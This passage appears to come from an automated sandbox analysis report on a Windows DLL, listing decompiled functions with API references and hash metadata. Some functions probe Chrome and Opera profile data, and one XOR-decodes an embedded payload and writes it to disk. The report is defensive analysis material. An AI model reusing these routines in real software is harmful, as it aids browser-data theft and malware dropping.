                                                  				_v300 = 0;
                                                  				E10025A10(_t36,  &_v296, 0, 0x118);
                                                  				_v300 = 0x11c;
                                                  				if(_v8 == 0) {
                                                  					L12:
                                                  					return 0;
                                                  				}
                                                  				_push( &_v300);
                                                  				if(_v8() != 0) {
                                                  					goto L12;
                                                  				}
                                                  				if(_v296 <= (_a4 & 0x0000ffff)) {
                                                  					if(_v296 >= (_a4 & 0x0000ffff)) {
                                                  						if(_v292 <= (_a8 & 0x0000ffff)) {
                                                  							if(_v292 >= (_a8 & 0x0000ffff)) {
                                                  								if((_v24 & 0x0000ffff) < (_a12 & 0x0000ffff)) {
                                                  									goto L12;
                                                  								}
                                                  								return 1;
                                                  							}
                                                  							return 0;
                                                  						}
                                                  						return 1;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 1;
                                                  			}

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion), ref: 10015483
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1001548A
                                                  • _memset.LIBCMT ref: 100154AB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc_memset
                                                  • String ID: RtlGetVersion$ntdll.dll
                                                  • API String ID: 3368017834-1489217083
                                                  • Opcode ID: f0411b4e5ae05a0873e0d5fc163622cbe6d5c2eea76f9532caa9f6777c5f66da
                                                  • Instruction ID: ef82c88800f85540164473f12be096c334d6701110700ae7cb67f5c65c915d1f
                                                  • Opcode Fuzzy Hash: f0411b4e5ae05a0873e0d5fc163622cbe6d5c2eea76f9532caa9f6777c5f66da
                                                  • Instruction Fuzzy Hash: 0C119E70804229E6CF60CF5098157ED73F6EB0530BF5491A5E949AE181E73ACAD0EF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E1009F4E0(void* __edi, void* __eflags) {
                                                  				char _v267;
                                                  				char _v268;
                                                  				char _v272;
                                                  
                                                  				_v272 = 0;
                                                  				_v268 = 0;
                                                  				E10025A10(__edi,  &_v267, 0, 0x103);
                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v268, 0x1c, 0);
                                                  				E10025E1D( &_v268,  &_v268, 0x104, "\\Google\\Chrome\\User Data");
                                                  				if(PathFileExistsA( &_v268) != 0) {
                                                  					_v272 = 1;
                                                  				}
                                                  				return _v272;
                                                  			}

                                                  APIs
                                                  • _memset.LIBCMT ref: 1009F508
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001C,00000000), ref: 1009F51D
                                                  • _strcat_s.LIBCMT ref: 1009F534
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1009F543
                                                  Strings
                                                  • \Google\Chrome\User Data, xrefs: 1009F523
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$ExistsFileFolderSpecial_memset_strcat_s
                                                  • String ID: \Google\Chrome\User Data
                                                  • API String ID: 262460964-4004360220
                                                  • Opcode ID: 225e417c17268c1e68cfcba1108931edcc714363e298203aab8375d69dcb8d3e
                                                  • Instruction ID: 091138065cd962437759b41a3236aa7b67415309ae8fd355c06ba1a3221470d0
                                                  • Opcode Fuzzy Hash: 225e417c17268c1e68cfcba1108931edcc714363e298203aab8375d69dcb8d3e
                                                  • Instruction Fuzzy Hash: 7CF0627594421857EB50DB60DC86FD977789B20700F4042C4EA88A61C0EBF9AAC48F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E1009E660(void* __edi, void* __eflags) {
                                                  				char _v267;
                                                  				char _v268;
                                                  				char _v272;
                                                  
                                                  				_v272 = 0;
                                                  				_v268 = 0;
                                                  				E10025A10(__edi,  &_v267, 0, 0x103);
                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v268, 0x1a, 0);
                                                  				E10025E1D( &_v268,  &_v268, 0x104, "\\Opera Software\\Opera Stable\\Preferences");
                                                  				if(PathFileExistsA( &_v268) != 0) {
                                                  					_v272 = 1;
                                                  				}
                                                  				return _v272;
                                                  			}

                                                  APIs
                                                  • _memset.LIBCMT ref: 1009E688
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1009E69D
                                                  • _strcat_s.LIBCMT ref: 1009E6B4
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1009E6C3
                                                  Strings
                                                  • \Opera Software\Opera Stable\Preferences, xrefs: 1009E6A3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$ExistsFileFolderSpecial_memset_strcat_s
                                                  • String ID: \Opera Software\Opera Stable\Preferences
                                                  • API String ID: 262460964-1945003741
                                                  • Opcode ID: c02b13473c05068dc98986d721c9ddc00705f43d7913f288a83e67806d850ce6
                                                  • Instruction ID: 57f12993f32fb78112b67dc2dbe288c0ace8254347ed89c983fec87c192620c5
                                                  • Opcode Fuzzy Hash: c02b13473c05068dc98986d721c9ddc00705f43d7913f288a83e67806d850ce6
                                                  • Instruction Fuzzy Hash: 4BF09675A4431867EB60DB60DC87FD97778AB20704F4041D4FA88A61C0EBF56AD48FD2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 71%
                                                  			E10009DB0(intOrPtr __ecx, char _a4, intOrPtr _a16, intOrPtr _a20) {
                                                  				char _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				char _v36;
                                                  				char _v40;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _v48;
                                                  				char _v92;
                                                  				char _v136;
                                                  				char _v148;
                                                  				char _v160;
                                                  				char _v172;
                                                  				char _v184;
                                                  				intOrPtr _v188;
                                                  				intOrPtr _v192;
                                                  				char _v204;
                                                  				char _v216;
                                                  				char _v228;
                                                  				intOrPtr _v232;
                                                  				intOrPtr _v236;
                                                  				intOrPtr _v240;
                                                  				char _v252;
                                                  				intOrPtr _v256;
                                                  				intOrPtr _v260;
                                                  				char _v272;
                                                  				char _v284;
                                                  				char _v296;
                                                  				char _v308;
                                                  				intOrPtr _v312;
                                                  				intOrPtr _v316;
                                                  				char _v328;
                                                  				char _v340;
                                                  				char _v352;
                                                  				intOrPtr _v356;
                                                  				intOrPtr _v360;
                                                  				char _v372;
                                                  				intOrPtr _v376;
                                                  				char _v388;
                                                  				intOrPtr _v392;
                                                  				intOrPtr _v396;
                                                  				intOrPtr _v400;
                                                  				intOrPtr _v404;
                                                  				intOrPtr _v408;
                                                  				intOrPtr* _t184;
                                                  				void* _t199;
                                                  				intOrPtr _t205;
                                                  				intOrPtr* _t209;
                                                  				intOrPtr _t219;
                                                  				intOrPtr* _t223;
                                                  				intOrPtr* _t245;
                                                  				intOrPtr _t359;
                                                  				intOrPtr _t368;
                                                  				intOrPtr _t374;
                                                  				intOrPtr _t381;
                                                  				intOrPtr _t382;
                                                  				intOrPtr _t383;
                                                  				intOrPtr _t384;
                                                  				intOrPtr _t385;
                                                  				intOrPtr _t387;
                                                  				intOrPtr _t390;
                                                  				intOrPtr _t393;
                                                  				intOrPtr _t394;
                                                  				intOrPtr _t395;
                                                  				intOrPtr _t397;
                                                  				intOrPtr _t400;
                                                  
                                                  				_push(0xffffffff);
                                                  				_push(0x101708f3);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t381;
                                                  				_push(__ecx);
                                                  				_t382 = _t381 - 0x184;
                                                  				_v20 = _t382;
                                                  				_v400 = __ecx;
                                                  				E1000B7D0( &_v36);
                                                  				_v48 = E1000B850( &_a4, E10009A40(_v400,  &_v148));
                                                  				_v44 =  *((intOrPtr*)(_v400 + 0x10)) - _v48;
                                                  				_v24 =  *((intOrPtr*)(_v400 + 0x10));
                                                  				if(_v48 >= _v44) {
                                                  					_v8 = 3;
                                                  					__eflags = _v44 - _a16;
                                                  					if(_v44 >= _a16) {
                                                  						_v40 = 0;
                                                  						while(1) {
                                                  							__eflags = _v40 - _a16;
                                                  							if(_v40 >= _a16) {
                                                  								break;
                                                  							}
                                                  							E10006DB0(_v400, E1000B870(E10009A40(_v400,  &_v328), _v48 + _v44 - _a16 + _v40));
                                                  							_t205 = _v40 + 1;
                                                  							__eflags = _t205;
                                                  							_v40 = _t205;
                                                  						}
                                                  						_t184 = E1000B000(E10009A40(_v400,  &_v340),  &_v352, _v48);
                                                  						_v36 =  *_t184;
                                                  						_v32 =  *((intOrPtr*)(_t184 + 4));
                                                  						_v28 =  *((intOrPtr*)(_t184 + 8));
                                                  						_v408 = E1000B1F0( &_v136, _a20);
                                                  						_v8 = 4;
                                                  						_t383 = _t382 - 0xc;
                                                  						_v356 = _t383;
                                                  						E1000B000( &_v36, _t383, _v44);
                                                  						_t384 = _t383 - 0xc;
                                                  						_v360 = _t384;
                                                  						E1000B810(E1000B000( &_v36,  &_v372, _v44), _t384, _a16);
                                                  						_t385 = _t384 - 0xc;
                                                  						_v376 = _t385;
                                                  						E1000B240(_t385,  &_v36);
                                                  						_push( &_v388);
                                                  						E1000C3A0(_t385);
                                                  						_push( &_v136);
                                                  						_t387 = _t385 + 0x28 - 0xc;
                                                  						_v392 = _t387;
                                                  						E1000B000( &_v36, _t387, _a16);
                                                  						_v396 = _t387 - 0xc;
                                                  						E1000B240(_t387 - 0xc,  &_v36);
                                                  						E1000C4C0(__eflags);
                                                  						_v8 = 3;
                                                  						_t199 = E10005790( &_v136);
                                                  					} else {
                                                  						_v40 = _a16 - _v44;
                                                  						while(1) {
                                                  							__eflags = _v40;
                                                  							if(_v40 <= 0) {
                                                  								break;
                                                  							}
                                                  							E10006DB0(_v400, _a20);
                                                  							_t219 = _v40 - 1;
                                                  							__eflags = _t219;
                                                  							_v40 = _t219;
                                                  						}
                                                  						_v40 = 0;
                                                  						while(1) {
                                                  							__eflags = _v40 - _v44;
                                                  							if(__eflags >= 0) {
                                                  								break;
                                                  							}
                                                  							E10006DB0(_v400, E1000B870(E10009A40(_v400,  &_v284), _v48 + _v40));
                                                  							_t359 = _v40 + 1;
                                                  							__eflags = _t359;
                                                  							_v40 = _t359;
                                                  						}
                                                  						_t209 = E1000B000(E10009A40(_v400,  &_v296),  &_v308, _v48);
                                                  						_v36 =  *_t209;
                                                  						_v32 =  *((intOrPtr*)(_t209 + 4));
                                                  						_v28 =  *((intOrPtr*)(_t209 + 8));
                                                  						_push(_a20);
                                                  						_t390 = _t382 - 0xc;
                                                  						_v312 = _t390;
                                                  						E1000B000( &_v36, _t390, _v44);
                                                  						_v316 = _t390 - 0xc;
                                                  						E1000B240(_t390 - 0xc,  &_v36);
                                                  						_t199 = E1000C4C0(__eflags);
                                                  					}
                                                  					_v8 = 0xffffffff;
                                                  				} else {
                                                  					_v8 = 0;
                                                  					if(_v48 >= _a16) {
                                                  						_v40 = _a16;
                                                  						while(1) {
                                                  							__eflags = _v40;
                                                  							if(_v40 <= 0) {
                                                  								break;
                                                  							}
                                                  							E1000B500(_v400, E1000B870(E10009A40(_v400,  &_v204), _a16 - 1));
                                                  							_t368 = _v40 - 1;
                                                  							__eflags = _t368;
                                                  							_v40 = _t368;
                                                  						}
                                                  						_t223 = E1000B000(E10009A40(_v400,  &_v216),  &_v228, _a16);
                                                  						_v36 =  *_t223;
                                                  						_v32 =  *((intOrPtr*)(_t223 + 4));
                                                  						_v28 =  *((intOrPtr*)(_t223 + 8));
                                                  						_v404 = E1000B1F0( &_v92, _a20);
                                                  						_v8 = 1;
                                                  						_t393 = _t382 - 0xc;
                                                  						_v232 = _t393;
                                                  						E1000B240(_t393,  &_v36);
                                                  						_t394 = _t393 - 0xc;
                                                  						_v236 = _t394;
                                                  						E1000B000( &_v36, _t394, _v48);
                                                  						_t395 = _t394 - 0xc;
                                                  						_v240 = _t395;
                                                  						E1000B000( &_v36, _t395, _a16);
                                                  						_push( &_v252);
                                                  						E1000C430( &_v252);
                                                  						_push( &_v92);
                                                  						_t397 = _t395 + 0x28 - 0xc;
                                                  						_v256 = _t397;
                                                  						E1000B000( &_v36, _t397, _v48);
                                                  						_v260 = _t397 - 0xc;
                                                  						E1000B000(E10009A40(_v400,  &_v272), _t397 - 0xc, _v48);
                                                  						E1000C4C0(__eflags);
                                                  						_v8 = 0;
                                                  						_t199 = E10005790( &_v92);
                                                  					} else {
                                                  						_v40 = _a16 - _v48;
                                                  						while(_v40 > 0) {
                                                  							E1000B500(_v400, _a20);
                                                  							_v40 = _v40 - 1;
                                                  						}
                                                  						_v40 = _v48;
                                                  						while(1) {
                                                  							__eflags = _v40;
                                                  							if(__eflags <= 0) {
                                                  								break;
                                                  							}
                                                  							E1000B500(_v400, E1000B870(E10009A40(_v400,  &_v160), _a16 - 1));
                                                  							_t374 = _v40 - 1;
                                                  							__eflags = _t374;
                                                  							_v40 = _t374;
                                                  						}
                                                  						_t245 = E1000B000(E10009A40(_v400,  &_v172),  &_v184, _a16);
                                                  						_v36 =  *_t245;
                                                  						_v32 =  *((intOrPtr*)(_t245 + 4));
                                                  						_v28 =  *((intOrPtr*)(_t245 + 8));
                                                  						_push(_a20);
                                                  						_t400 = _t382 - 0xc;
                                                  						_v188 = _t400;
                                                  						E1000B000( &_v36, _t400, _v48);
                                                  						_v192 = _t400 - 0xc;
                                                  						E1000B240(_t400 - 0xc,  &_v36);
                                                  						_t199 = E1000C4C0(__eflags);
                                                  					}
                                                  					_v8 = 0xffffffff;
                                                  				}
                                                  				 *[fs:0x0] = _v16;
                                                  				return _t199;
                                                  			}

                                                  APIs
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009F0B
                                                    • Part of subcall function 1000B500: allocator.LIBCPMTD ref: 1000B581
                                                    • Part of subcall function 1000B500: allocator.LIBCONCRTD ref: 1000B5B8
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 10009FBC
                                                  • _DebugHeapAllocator.LIBCPMTD ref: 1000A177
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocatorDebugHeap$allocator
                                                  • String ID:
                                                  • API String ID: 814207127-0
                                                  • Opcode ID: 494bc7cbfefbd4af1a48fb8f43ad780c074b8891893442d4f25d9ad707f55186
                                                  • Instruction ID: 41ddcd4d4e2439ec11f7f95cf3f6457dad3d7385cba3bae317198d3843e05920
                                                  • Opcode Fuzzy Hash: 494bc7cbfefbd4af1a48fb8f43ad780c074b8891893442d4f25d9ad707f55186
                                                  • Instruction Fuzzy Hash: E0F10975E1021CDFDB14DFA8C991AEEB7B5FF88340F108199E50667259DA30AE84CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E100A5070(void* __edx, void* __eflags, CHAR* _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				long _v20;
                                                  				struct _OVERLAPPED* _v24;
                                                  				void* __ebp;
                                                  				void* _t37;
                                                  				void* _t47;
                                                  				void* _t48;
                                                  
                                                  				_v20 = 0;
                                                  				_v12 = E100253AE(_t37, __edx, _t47, _t48, 0x194d0);
                                                  				_v24 = 0;
                                                  				while(_v24 < 0x194d0) {
                                                  					_t8 = _v24 + 0x103e0688; // 0x101d0c94
                                                  					 *((char*)(_v12 + _v24)) =  *_t8 & 0x000000ff ^ 0x0000007b;
                                                  					_v24 =  &(_v24->Internal);
                                                  				}
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				_v16 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0);
                                                  				__eflags = _v16 - 0xffffffff;
                                                  				if(__eflags != 0) {
                                                  					WriteFile(_v16, _v12, 0x194d0,  &_v8, 0);
                                                  					CloseHandle(_v16);
                                                  					__eflags = PathFileExistsA(_a4);
                                                  					if(__eflags != 0) {
                                                  						_v20 = 1;
                                                  					}
                                                  				}
                                                  				_push(_v12);
                                                  				E100252D1(_t37, _t47, _t48, __eflags);
                                                  				return _v20;
                                                  			}

                                                  APIs
                                                  • _malloc.LIBCMT ref: 100A5082
                                                    • Part of subcall function 100253AE: __FF_MSGBANNER.LIBCMT ref: 100253D1
                                                    • Part of subcall function 100253AE: __NMSG_WRITE.LIBCMT ref: 100253D8
                                                    • Part of subcall function 100253AE: HeapAlloc.KERNEL32(00000000,1002359C,?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 10025426
                                                  • CreateFileA.KERNEL32(100A5BC9,40000000,00000001,00000000,00000002,00000000,00000000), ref: 100A50E0
                                                  • WriteFile.KERNEL32(000000FF,100A5BC9,000194D0,00000000,00000000), ref: 100A5102
                                                  • CloseHandle.KERNEL32(000000FF), ref: 100A510C
                                                  • PathFileExistsA.SHLWAPI(100A5BC9), ref: 100A5116
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                   • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AllocCloseCreateExistsHandleHeapPathWrite_malloc
                                                  • String ID:
                                                  • API String ID: 2118286245-0
                                                  • Opcode ID: 61b09c0408fb9ea785b5fb69041387967dcff77d14f2c74783d8dd2ba4d3c2a3
                                                  • Instruction ID: 4cf81658cd053e6dee7f4edc1ca3d44c03c2af5dc6a49d26cd4c721072dae72a
                                                  • Opcode Fuzzy Hash: 61b09c0408fb9ea785b5fb69041387967dcff77d14f2c74783d8dd2ba4d3c2a3
                                                  • Instruction Fuzzy Hash: 8B214FB4900208EBDB10DFE4CC85FEE7BB5FB44305F204554E511BB281D776AA84CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E10145DD0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				void* _t17;
                                                  				void* _t18;
                                                  				void* _t19;
                                                  				void* _t21;
                                                  				void* _t25;
                                                  				void* _t30;
                                                  				void* _t38;
                                                  				void* _t42;
                                                  				void* _t44;
                                                  				void* _t46;
                                                  
                                                  				_t38 = __edi;
                                                  				_t30 = __ebx;
                                                  				_t17 = E10023280(_a4);
                                                  				_t18 = E10023280(_a8);
                                                  				_t44 = _t42 + 8;
                                                  				if(_t17 >= _t18) {
                                                  					_v8 = _a4;
                                                  					_v12 = 0;
                                                  					while(1) {
                                                  						_t19 = E10023280(_a8);
                                                  						_t21 = E10023280(_a4);
                                                  						_t46 = _t44 + 8;
                                                  						if(_t19 + _v12 > _t21) {
                                                  							break;
                                                  						}
                                                  						_t25 = E10023B6E(_t30, _a8, _t38, _v8, _a8, E10023280(_a8));
                                                  						_t44 = _t46 + 0x10;
                                                  						if(_t25 != 0) {
                                                  							_v12 = _v12 + 1;
                                                  							_v8 = _v8 + 1;
                                                  							continue;
                                                  						}
                                                  						return 1;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                   • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: cc20ad91008c13126a571b799b31833ff96000464e7d0fc5089879dbb14974e9
                                                  • Instruction ID: b4782cba6e62bd4db5a1c29794b12e8e3c6f9565afb32b82682393525f62ffa6
                                                  • Opcode Fuzzy Hash: cc20ad91008c13126a571b799b31833ff96000464e7d0fc5089879dbb14974e9
                                                  • Instruction Fuzzy Hash: 131124BAD00108F7DB00DBA8E8419CEB7A8DB04258F55C565ED09E7302E639EF5497A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E100252D1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr* _t10;
                                                  				intOrPtr _t13;
                                                  				intOrPtr _t23;
                                                  				void* _t25;
                                                  
                                                  				_push(0xc);
                                                  				_push(0x1027d170);
                                                  				_t8 = E1002EB4C(__ebx, __edi, __esi);
                                                  				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                  				if(_t23 == 0) {
                                                  					L9:
                                                  					return E1002EB91(_t8);
                                                  				}
                                                  				if( *0x1040508c != 3) {
                                                  					_push(_t23);
                                                  					L7:
                                                  					_t8 = HeapFree( *0x104018b4, 0, ??);
                                                  					_t31 = _t8;
                                                  					if(_t8 == 0) {
                                                  						_t10 = L10028DE9(_t31);
                                                  						 *_t10 = E10028DAE(GetLastError());
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				E1002E01C(4);
                                                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                  				_t13 = E1002E095(_t23);
                                                  				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                  				if(_t13 != 0) {
                                                  					_push(_t23);
                                                  					_push(_t13);
                                                  					E1002E0C0();
                                                  				}
                                                  				 *(_t25 - 4) = 0xfffffffe;
                                                  				_t8 = E10025327();
                                                  				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                  					goto L9;
                                                  				} else {
                                                  					_push( *((intOrPtr*)(_t25 + 8)));
                                                  					goto L7;
                                                  				}
                                                  			}

                                                  APIs
                                                  • __lock.LIBCMT ref: 100252EF
                                                    • Part of subcall function 1002E01C: __mtinitlocknum.LIBCMT ref: 1002E030
                                                    • Part of subcall function 1002E01C: __amsg_exit.LIBCMT ref: 1002E03C
                                                    • Part of subcall function 1002E01C: EnterCriticalSection.KERNEL32(40182005,40182005,100235AB,10025381,00000004,1027D190,0000000C,1002540C,100235AB,?,00000003,?,?,100235AB,00000000,10001F33), ref: 1002E044
                                                  • ___sbh_find_block.LIBCMT ref: 100252FA
                                                  • ___sbh_free_block.LIBCMT ref: 10025309
                                                  • HeapFree.KERNEL32(00000000,100235AB,1027D170,Function_000252D1,1002DFFD,00000000,1027D5F0,0000000C,1002E035,100235AB,40182005,100235AB,10025381,00000004,1027D190,0000000C), ref: 10025339
                                                  • GetLastError.KERNEL32(?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 1002534A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                   • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                   • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                   • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2714421763-0
                                                  • Opcode ID: afe961262780276a61c4e52276af1ad014fbbb2c28883b0c4c4ea41faaf10445
                                                  • Instruction ID: 78dd0faed67d6c3e5babdeb856c86d41edc325d1290f50be89b4402b40a0d59f
                                                  • Opcode Fuzzy Hash: afe961262780276a61c4e52276af1ad014fbbb2c28883b0c4c4ea41faaf10445
                                                  • Instruction Fuzzy Hash: 1001DB36841351EADB20DF71BC46B8E3BB0EF003A1FD45115F405AA0D2DB75AE80DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 89%
                                                  			E1013AC90(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr* _v20;
                                                  				intOrPtr _v24;
                                                  				char _v152;
                                                  				char _v180;
                                                  				char _v208;
                                                  				intOrPtr _v212;
                                                  				intOrPtr _v216;
                                                  				void* __ebp;
                                                  				intOrPtr _t76;
                                                  				void* _t77;
                                                  
                                                  				_t75 = __esi;
                                                  				_t74 = __edi;
                                                  				_t56 = __ebx;
                                                  				_push(0xffffffff);
                                                  				_push(0x1016d548);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t76;
                                                  				_t77 = _t76 - 0xc8;
                                                  				if(_a8 > 0x7ffffffa) {
                                                  					E10006F20( &_v152, 2, 1);
                                                  					_v8 = 0;
                                                  					E1000FF20( &_v152,  &_v152, "in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing");
                                                  					_t77 = _t77 + 8;
                                                  					_v212 = E10007040( &_v152,  &_v180);
                                                  					_v216 = _v212;
                                                  					_v8 = 1;
                                                  					E10138DD0(_v216);
                                                  					_v8 = 0;
                                                  					E10001360( &_v180);
                                                  					E10026CE8(__ebx, _v212, __edi, __esi);
                                                  					_v8 = 0xffffffff;
                                                  					E10005930( &_v152, __esi);
                                                  				}
                                                  				_v24 = _a8 + 5;
                                                  				_v20 = E100253AE(_t56, _v24, _t74, _t75, _v24);
                                                  				if(_v20 == 0) {
                                                  					E10001320( &_v208, "in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer");
                                                  					_v8 = 2;
                                                  					E10138E00( &_v208);
                                                  					_v8 = 0xffffffff;
                                                  					E10001360( &_v208);
                                                  				}
                                                  				 *_v20 = _a8;
                                                  				E10023600(_t56, _t74, _t75, _v20 + 4, _a4, _a8);
                                                  				 *((char*)(_v20 + _v24 - 1)) = 0;
                                                  				 *[fs:0x0] = _v16;
                                                  				return _v20;
                                                  			}

                                                  APIs
                                                  • _malloc.LIBCMT ref: 1013AD4C
